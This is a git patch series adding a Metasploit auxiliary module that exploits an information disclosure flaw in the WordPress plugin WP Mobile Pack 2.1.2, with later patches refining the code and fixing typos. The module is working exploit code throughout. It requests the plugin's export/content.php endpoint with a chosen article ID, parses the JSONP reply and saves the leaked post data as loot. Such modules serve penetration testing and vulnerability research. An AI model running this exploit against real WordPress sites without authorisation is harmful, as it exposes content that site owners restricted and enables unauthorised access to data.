From f4679f5341addf9c6a7ac6ea6cb7c01cc13fbc2d Mon Sep 17 00:00:00 2001 From: Roberto Soares Date: Tue, 4 Aug 2015 02:21:26 -0300 Subject: [PATCH 1/5] Added WP Mobile Pack Info Disclosure Vuln - Functional Module. --- .../http/wp_mobile_pack_info_disclosure.rb | 79 +++++++++++++++++++ 1 file changed, 79 insertions(+) create mode 100644 modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb new file mode 100644 index 0000000000..3ec9c4c703 --- /dev/null +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -0,0 +1,79 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Report + include Msf::HTTP::Wordpress + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'WordPress Mobile Pack Information Disclosure Vulnerability', + 'Description' => %q{ + This module exploits a information disclosure vulnerability in WordPress Plugin + "WP Mobile Pack" version 2.1.2, allowing to read files with privileges + informations. + }, + 'References' => + [ + ['WPVDB', '8107'] + ], + 'Author' => + [ + 'Nitin Venkatesh', # Vulnerability Discovery + 'Roberto Soares Espreto ' # Metasploit Module + ], + 'License' => MSF_LICENSE + )) + + register_options( + [ + OptString.new('POSTID', [true, 'Set the post identification to read', '1']) + ], self.class) + end + + def check + check_plugin_version_from_readme('wordpress-mobile-pack', '2.1.3') + end + + def run_host(ip) + + postid = datastore['POSTID'] + + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'wordpress-mobile-pack', 'export', 'content.php'), + 'vars_get' => + { + 'content' => 'exportarticle', + 'callback' => 'exportarticle', + 'articleId' => "#{postid}" + } + ) + + if res && res.code == 200 && res.body.length > 0 + + vprint_status('Downloading information...') + vprint_line("\n#{res.body}\n") + + fname = datastore['FILEPATH'] + + path = store_loot( + 'mobilepack.disclosure', + 'text/plain', + ip, + res.body, + fname + ) + + print_good("#{peer} - File saved in: #{path}") + else + print_error("#{peer} - Nothing was downloaded. You can try to verify the POSTID parameter.") + end + end +end From 19ceccd93a13bfd04910615d5eec6ebcff618be9 Mon Sep 17 00:00:00 2001 From: Roberto Soares Date: Tue, 4 Aug 2015 03:13:11 -0300 Subject: [PATCH 2/5] Added JSON parse output. --- .../http/wp_mobile_pack_info_disclosure.rb | 32 +++++++++++-------- 1 file changed, 19 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index 3ec9c4c703..6e4630b574 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -45,30 +45,36 @@ class Metasploit3 < Msf::Auxiliary postid = datastore['POSTID'] - res = send_request_cgi( - 'method' => 'GET', - 'uri' => normalize_uri(wordpress_url_plugins, 'wordpress-mobile-pack', 'export', 'content.php'), - 'vars_get' => - { + begin + res = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(wordpress_url_plugins, 'wordpress-mobile-pack', 'export', 'content.php'), + 'vars_get' => { 'content' => 'exportarticle', 'callback' => 'exportarticle', 'articleId' => "#{postid}" } - ) + ) + temp = JSON.parse(res.body.gsub(/exportarticle\(/, "").gsub(/\)/, "")) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e + print_error("#{peer} - The following Error was encountered: #{e.class}") + return + end - if res && res.code == 200 && res.body.length > 0 + if res && + res.code == 200 && + res.body.length > 0 && + res.headers['Content-Type'].include?('application/json') - vprint_status('Downloading information...') - vprint_line("\n#{res.body}\n") - - fname = datastore['FILEPATH'] + vprint_status('Enumerating information...') + res_clean = JSON.pretty_generate(temp) + vprint_good("Found:\n\n#{res_clean}\n") path = store_loot( 'mobilepack.disclosure', 'text/plain', ip, - res.body, - fname + res_clean ) print_good("#{peer} - File saved in: #{path}") From d9b6e9cc58286d52b077fb80a586cc2f8ae6b643 Mon Sep 17 00:00:00 2001 From: Roberto Soares Date: Tue, 4 Aug 2015 03:44:25 -0300 Subject: [PATCH 3/5] Changed res condition and some words. --- .../scanner/http/wp_mobile_pack_info_disclosure.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index 6e4630b574..d9c69b9ca1 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ - OptString.new('POSTID', [true, 'Set the post identification to read', '1']) + OptString.new('POSTID', [true, 'The post identification to read', '1']) ], self.class) end @@ -63,10 +63,11 @@ class Metasploit3 < Msf::Auxiliary if res && res.code == 200 && - res.body.length > 0 && - res.headers['Content-Type'].include?('application/json') + res.body.length > 29 && + res.headers['Content-Type'].include?('application/json') && + !res.body.include?('"error":') - vprint_status('Enumerating information...') + vprint_status('Enumerating...') res_clean = JSON.pretty_generate(temp) vprint_good("Found:\n\n#{res_clean}\n") @@ -76,10 +77,9 @@ class Metasploit3 < Msf::Auxiliary ip, res_clean ) - print_good("#{peer} - File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to verify the POSTID parameter.") + print_error("#{peer} - Nothing was downloaded. You can try checking the POSTID parameter.") end end end From 7bb4f9479f5355b0f692e0d4d5d6f1d85d1187da Mon Sep 17 00:00:00 2001 From: Roberto Soares Date: Tue, 4 Aug 2015 03:58:57 -0300 Subject: [PATCH 4/5] Added new reference and removed empty line. --- .../auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index d9c69b9ca1..42b243f59a 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -21,7 +21,8 @@ class Metasploit3 < Msf::Auxiliary }, 'References' => [ - ['WPVDB', '8107'] + ['WPVDB', '8107'], + ['URL', 'https://packetstormsecurity.com/files/132750/'] ], 'Author' => [ @@ -42,7 +43,6 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - postid = datastore['POSTID'] begin From 9e7f6d65009e77a1ec5fd31614133896bd8886b3 Mon Sep 17 00:00:00 2001 From: wchen-r7 Date: Fri, 28 Aug 2015 13:42:37 -0500 Subject: [PATCH 5/5] Typos --- .../auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index 42b243f59a..ffa1494ac1 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -15,9 +15,9 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'WordPress Mobile Pack Information Disclosure Vulnerability', 'Description' => %q{ - This module exploits a information disclosure vulnerability in WordPress Plugin + This module exploits an information disclosure vulnerability in WordPress Plugin "WP Mobile Pack" version 2.1.2, allowing to read files with privileges - informations. + information. }, 'References' => [